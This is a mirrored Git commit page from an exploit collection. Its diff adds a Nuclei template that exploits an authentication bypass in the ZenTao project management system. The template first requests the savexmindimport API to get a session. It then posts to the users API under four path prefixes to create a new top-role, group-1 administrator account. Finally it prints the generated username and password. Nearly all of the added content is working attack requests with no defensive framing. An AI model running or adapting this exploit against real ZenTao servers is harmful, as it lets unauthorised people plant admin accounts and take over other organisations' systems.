mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 19:35:34 +08:00
Update 禅道项目管理系统身份认证绕过漏洞.md
This commit is contained in:
@@ -43,3 +43,82 @@ http:
|
|||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
|
# digest: 4a0a0047304502200b7a7cb58af457a9e566160cfdc539a99325db1513d5e4172a9a0a66f2f44e63022100fe0cc4ffd848c733eba3240bf102695253caa1420845a2b8aec5ca731e394759:58d4ffcb61df0489d6ab2fd018c17de6
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## 添加用户poc
|
||||||
|
```
|
||||||
|
id: easycorp-zentao-pms-idor-exp
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: 禅道项目管理系统身份认证绕过漏洞
|
||||||
|
author: GuoRong_X
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
- 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
|
||||||
|
reference:
|
||||||
|
- https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
fofa-query: title="用户登录- 禅道"
|
||||||
|
tags: zentao
|
||||||
|
variables:
|
||||||
|
username: '{{rand_base(6)}}'
|
||||||
|
password: '{{rand_base(12)}}'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /api.php/v1/users HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /zentao/api.php/v1/users HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /biz/api.php/v1/users HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /max/api.php/v1/users HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"}
|
||||||
|
cookie-reuse: true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '"USER: "+ username'
|
||||||
|
- '"PASS: "+ password'
|
||||||
|
# digest: 4a0a00473045022100f877e8e0df5985e15645227a3f12f66e08fe50250102f4df141f234afcc0e2e90220485c468e8de448c3e9c92875d8a1bd6d8fafffa0f294fffd4a4443e221e6de6b:58d4ffcb61df0489d6ab2fd018c17de6
|
||||||
|
|
||||||
|
```
|
||||||
|
|||||||
Reference in New Issue
Block a user